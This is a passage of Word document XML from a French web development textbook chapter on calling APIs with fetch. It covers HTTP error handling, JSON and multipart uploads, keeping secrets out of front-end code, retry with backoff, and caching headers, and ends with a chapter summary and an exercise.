        <w:br/>
        <w:t>}</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`FETCH` NE REJETTE PAS SUR UN CODE 404</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une promesse </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fetch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est rejetée uniquement en cas d'erreur réseau. Un 404 ou un 500 produit une réponse valide avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ok</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Vérifier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reponse.ok</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est donc obligatoire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.3 Envoyer des données</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON est le format par défaut des API modernes. Le corps doit être sérialisé, et l'en-tête </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit correspondre, faute de quoi le serveur interprète mal la requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un envoi JSON minimal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const article = { titre: "Grid", contenu: "…", tags: ["css"] };</w:t>
        <w:br/>
        <w:br/>
        <w:t>const reponse = await fetch("/api/articles", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  method: "POST",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  headers: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Content-Type": "application/json",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Accept: "application/json",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body: JSON.stringify(article),</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un envoi multipart correct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Envoi de formulaire, y compris fichier</w:t>
        <w:br/>
        <w:t>const donnees = new FormData(formulaire);</w:t>
        <w:br/>
        <w:t>const r = await fetch("/api/upload", { method: "POST", body: donnees });</w:t>
        <w:br/>
        <w:t>// Ne pas définir Content-Type : le navigateur ajoute la frontière multipart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ajouter manuellement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Content-Type: multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> casse l'envoi : la frontière qui sépare les parties manque. Laissez le navigateur générer l'en-tête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.4 Authentification et secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un site front-end ne peut pas garder un secret. Toute clé présente dans le code JavaScript est publique : elle est lisible dans l'onglet Réseau ou dans les sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f38.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.38 — Deux façons d'appeler une API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.94 — Quatre mécanismes et leur exposition</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231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Mécanisme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Où</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HttpOnly</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En-tête automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible (CSRF à traiter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Jeton en mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>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Variable JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Onglet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Faible (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>localStorage</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Stockage persistant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Longue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Clé d'API</w:t>
            </w:r>
          </w:p>
        </w:tc>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Code JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Permanente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Critique : ne jamais faire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2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LA RÈGLE DU SECRET</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si une valeur ne doit pas être connue de l'utilisateur, elle ne doit pas transiter par le navigateur. Un proxy côté serveur masque la clé et applique les contrôles d'accès.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.5 Erreurs réseau et résilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois familles d'échecs coexistent : la requête n'a pas abouti (réseau), elle a abouti avec un code d'erreur (HTTP), ou la réponse est inexploitable (format). Chacune mérite un message distinct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois tentatives avec attente croissante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async function charger(url, essais = 3) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (let i = 0; i &lt; essais; i += 1) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const r = await fetch(url);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (r.status === 429) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        const attente = Number(r.headers.get("Retry-After") || 2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">        await new Promise(r =&gt; setTimeout(r, attente * 1000));</w:t>
        <w:br/>
        <w:t xml:space="preserve">        continue;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (r.status &gt;= 500) throw new Error("Serveur indisponible");</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (!r.ok) throw new Error(`Erreur ${r.status}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return await r.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (i === essais - 1) throw e;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      await new Promise(r =&gt; setTimeout(r, 2 ** i * 500));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La stratégie d'attente exponentielle évite d'aggraver une panne en envoyant des dizaines de requêtes simultanées. Ajoutez une variation aléatoire pour éviter que tous les clients réessaient au même instant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.6 Cache et limitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux moyens simples réduisent la charge : le cache HTTP et un cache mémoire court côté client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux niveaux de cache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Cache HTTP : géré par le navigateur</w:t>
        <w:br/>
        <w:t>fetch("/api/catalogue", { cache: "no-cache" });   // revalide</w:t>
        <w:br/>
        <w:t>fetch("/api/logo.svg", { cache: "force-cache" }); // réutilise</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Cache mémoire applicatif</w:t>
        <w:br/>
        <w:t>const cache = new Map();</w:t>
        <w:br/>
        <w:t>async function catalogue() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (cache.has("catalogue")) return cache.get("catalogue");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const donnees = await charger("/api/catalogue");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cache.set("catalogue", donnees);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return donnees;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.95 — Quatre en-têtes de cache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14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En-tête</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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w:t>
            </w:r>
          </w:p>
        </w:tc>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cache-Control: max-age=3600</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valide 1 heure</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Ressources stables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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ETag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Revalidation par empreinte</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Contenus changeants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Last-Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revalidation par date</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Secours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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no-store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Jamais stocké</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Données sensibles</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INTÉGRER UNE API EN CINQ ÉTAPES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Lire la documentation et repérer l'authentification.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Tester chaque point d'entrée dans un client HTTP.</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Écrire une fonction d'appel centrale.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Traiter les trois familles d'erreurs.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Mettre en cache ce qui change peu.</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requête se compose d'une méthode, d'une URL, d'en-têtes et d'un corps.</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fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne rejette que sur une erreur réseau.</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code 4xx se corrige côté client, un 5xx se réessaie avec prudence.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Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit correspondre au corps envoyé.</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Aucun secret ne peut être stocké dans du code front-end.</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erreurs réseau, HTTP et de format se distinguent.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Cache HTTP et cache mémoire réduisent la charge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les données circulent. Il reste à les conserver entre deux visites : le chapitre suivant traite du stockage et de l'état.</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30.1 — Écrire un client d'API robuste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 xml:space="preserve">Créez une fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>api(chemin, options)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui gère tout le cycle.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 xml:space="preserve">Vérifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reponse.ok</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Distingue absence de contenu et JSON.</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Lève une erreur typée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
